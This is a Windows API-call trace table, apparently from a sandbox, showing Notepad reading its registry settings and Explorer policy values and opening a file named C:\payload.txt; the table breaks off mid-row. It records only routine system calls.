| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000100 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000000f8 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000118 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000110 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000108 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000128 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000120 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000140 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000138 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000130 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000148 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000158 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000150 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000000f2 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x00185000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001c1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x00196000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001a6000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001d5000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | ExitProcess |
ExitCode => 0 |
SUCCESS | 0x00000000 |
| Timestamp | Thread | Function | Arguments | Status | Return | Repeated |
|---|---|---|---|---|---|---|
| 19:40:26,664 | 968 | GetSystemMetrics |
SystemMetricIndex => 41 |
SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegisterPenApp FunctionAddress => 0x010013d8 ModuleHandle => 0x01000000 |
FAILURE | 0xc000007a | |
| 19:40:26,664 | 968 | GetSystemMetrics |
SystemMetricIndex => 41 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,664 | 968 | RegCreateKeyExW |
Handle => 0x000000bc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Notepad |
SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfEscapement Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfOrientation Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfWeight Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfItalic Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfUnderline Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfStrikeOut Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfCharSet Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfOutPrecision Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfClipPrecision Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfQuality Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfPitchAndFamily Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 64 ValueName => lfFaceName Type => 16821052 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iPointSize Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => fWrap Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => StatusBar Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => fSaveWindowPositions Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 80 ValueName => szHeader Type => 16819168 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 80 ValueName => szTrailer Type => 16819248 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iMarginTop Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iMarginBottom Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iMarginLeft Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iMarginRight Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosY Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosX Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosDX Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => iWindowPosDY Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => fMLE_is_broken Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegCloseKey |
Handle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 10 times |
| 19:40:26,664 | 968 | LdrLoadDll |
Flags => 521708 BaseAddress => 0x5ad70000 FileName => UxTheme.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => OpenThemeData FunctionAddress => 0x5ad773b8 ModuleHandle => 0x5ad70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,674 | 968 | GetSystemMetrics |
SystemMetricIndex => 5 |
SUCCESS | 0x00000001 | |
| 19:40:26,674 | 968 | GetSystemMetrics |
SystemMetricIndex => 6 |
SUCCESS | 0x00000001 | |
| 19:40:26,674 | 968 | GetSystemMetrics |
SystemMetricIndex => 5 |
SUCCESS | 0x00000001 | |
| 19:40:26,674 | 968 | GetSystemMetrics |
SystemMetricIndex => 6 |
SUCCESS | 0x00000001 | |
| 19:40:26,684 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetThemeTextMetrics FunctionAddress => 0x5ad8b293 ModuleHandle => 0x5ad70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,684 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetThemeBackgroundExtent FunctionAddress => 0x5ad8b1ad ModuleHandle => 0x5ad70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,684 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetThemeMargins FunctionAddress => 0x5ad7b0d2 ModuleHandle => 0x5ad70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,684 | 968 | GetSystemMetrics |
SystemMetricIndex => 5 |
SUCCESS | 0x00000001 | |
| 19:40:26,684 | 968 | GetSystemMetrics |
SystemMetricIndex => 6 |
SUCCESS | 0x00000001 | |
| 19:40:26,694 | 968 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 31 times |
| 19:40:26,704 | 968 | GetSystemMetrics |
SystemMetricIndex => 5 |
SUCCESS | 0x00000001 | |
| 19:40:26,704 | 968 | GetSystemMetrics |
SystemMetricIndex => 6 |
SUCCESS | 0x00000001 | |
| 19:40:26,704 | 968 | FindFirstFileExW |
FileName => C:\payload.txt |
SUCCESS | 0x000bca68 | |
| 19:40:26,704 | 968 | NtCreateFile |
ShareAccess => 3 FileName => C:\payload.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | NtQueryInformationFile |
FileHandle => 0x000000bc FileInformation => \x10\xd8\x10?\xac\x9f\xd3\x01p\xe6\x13?\xac\x9f\xd3\x01p\xe6\x13?\xac\x9f\xd3\x01p\xe6\x13?\xac\x9f\xd3\x01 \x00\x00\x00\x00\x00\x00\x00\x88\x01\x00\x00\x00\x00\x00\x00\x82\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xae9\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x89\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\\x00p\x00 |
FAILURE | 0x80000005 | |
| 19:40:26,704 | 968 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000000c0 FileHandle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | ZwMapViewOfSection |
SectionOffset => 0x0007fb38 SectionHandle => 0x000000c0 ProcessHandle => 0xffffffff BaseAddress => 0x003c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | FindFirstFileExW |
FileName => C:\payload.txt |
SUCCESS | 0x000bca68 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c0 DataLength => 4 ValueName => NoNetHood Type => 517972 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c0 DataLength => 4 ValueName => NoPropertiesMyComputer Type => 517972 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c0 DataLength => 4 ValueName => NoInternetIcon Type => 517972 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\NOTEPAD.EXE |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 236 FunctionName => FunctionAddress => 0x773e1798 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => OLE32.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll |
Flags => 517132 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoGetMalloc FunctionAddress => 0x774fdd08 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c0 DataLength => 4 ValueName => NoCommonGroups Type => 517972 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateBindCtx FunctionAddress => 0x774fe54c ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D} |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c0 DataLength => 4 ValueName => NoControlPanel Type => 516328 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c0 DataLength => 4 ValueName => NoSetFolders Type => 516328 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExA |
Handle => 0x000000c6 Registry => 0x80000000 SubKey => CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c6 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00S\x00H\x00E\x00L\x00L\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll |
Flags => 516908 BaseAddress => 0x7c9c0000 FileName => C:\WINDOWS\system32\SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c6 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegEnumKeyW |
Handle => 0x000000c6 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000ca Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000ca Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000ca |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegEnumKeyW |
Handle => 0x000000c6 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c4 DataLength => 4 ValueName => AllowFileCLSIDJunctions Type => 515164 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll |
Flags => 517232 BaseAddress => 0x7c9c0000 FileName => SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 102 FunctionName => FunctionAddress => 0x7c9ef5e2 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrLoadDll |
Flags => 517272 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemAlloc FunctionAddress => 0x774fd060 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 320 FunctionName => FunctionAddress => 0x773e0a75 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 324 FunctionName => FunctionAddress => 0x773e0c22 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | LdrGetProcedureAddress |
Ordinal => 323 FunctionName => FunctionAddress => 0x773e0b17 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c6 Registry => 0x80000000 SubKey => Directory |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000c6 SubKey => CurVer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000ca Registry => 0x000000c6 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000c4 DataLength => 4 ValueName => DontShowSuperHidden Type => 516936 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x000000c4 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 36 ValueName => ShellState Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => ValueName => ShellState |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => ForceActiveDesktopOn Type => 516268 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => NoActiveDesktop Type => 516264 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | GetSystemMetrics |
SystemMetricIndex => 4096 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\System |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | GetSystemMetrics |
SystemMetricIndex => 4096 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => NoWebView Type => 516268 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => ClassicShell Type => 516268 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => SeparateProcess Type => 516268 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => NoNetCrawling Type => 516268 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc DataLength => 4 ValueName => NoSimpleStartMenu Type => 516268 |
FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW |
Handle => 0x000000cc Registry => 0x000000c4 SubKey => Advanced |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 2 ValueName => Hidden |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 1 ValueName => ShowCompColor |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 1 ValueName => HideFileExt |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 0 ValueName => DontPrettyPath |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 1 ValueName => ShowInfoTip |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 0 ValueName => HideIcons |
SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW |
Handle => 0x000000cc Data => 0 ValueName => MapNetDrvBtn |
